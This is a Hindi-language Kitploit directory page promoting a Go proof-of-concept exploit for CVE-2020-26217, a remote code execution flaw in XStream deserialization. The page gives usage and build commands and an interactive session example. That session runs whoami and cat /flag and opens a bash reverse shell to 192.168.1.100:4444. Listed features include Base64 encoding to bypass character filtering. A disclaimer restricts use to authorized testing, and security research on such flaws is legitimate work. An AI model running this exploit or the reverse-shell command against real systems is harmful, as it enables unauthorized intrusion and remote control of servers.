Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStream डिसीरियलाइज़ेशन का पीओसी | Kitploit
उपकरण/GitHubGitHub/kairo-one/cve-2020-26217-xstream
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream डिसीरियलाइज़ेशन का पीओसी

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-26217 XStream RCE Exploit

XStream रिमोट कोड एक्सीक्यूशन शोषण उपकरण।

भेद्यता विवरण

CVE-2020-26217 XStream लाइब्रेरी में एक डी-सीरियलाइज़ेशन भेद्यता है, जिसके माध्यम से हमलावर दुर्भावनापूर्ण XML डेटा बनाकर रिमोट कोड एक्सीक्यूशन को ट्रिगर कर सकते हैं।

प्रभावित संस्करण: XStream <= 1.4.13

उपयोग विधि

root@kitploit:~
go run poc.go <लक्ष्य URL>

उदाहरण

root@kitploit:~
# उपकरण चलाएं
go run poc.go http://target.com:8080/?data

# इंटरैक्टिव मोड में प्रवेश करने के बाद कमांड दर्ज करें
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

कार्य विशेषताएँ

  • इंटरैक्टिव कमांड निष्पादन
  • URL पैरामीटर नाम का स्वचालित पार्सिंग
  • विशेष वर्ण फ़िल्टरिंग को बायपास करने के लिए Base64 एन्कोडिंग
  • HTTPS समर्थन (प्रमाणपत्र सत्यापन छोड़ें)

संकलन

root@kitploit:~
go build -o poc poc.go

अस्वीकरण

यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, कृपया इसका उपयोग अवैध उद्देश्यों के लिए न करें। उपयोगकर्ता संबंधित कानूनी जिम्मेदारी स्वयं वहन करेगा।

टूल डाउनलोड करें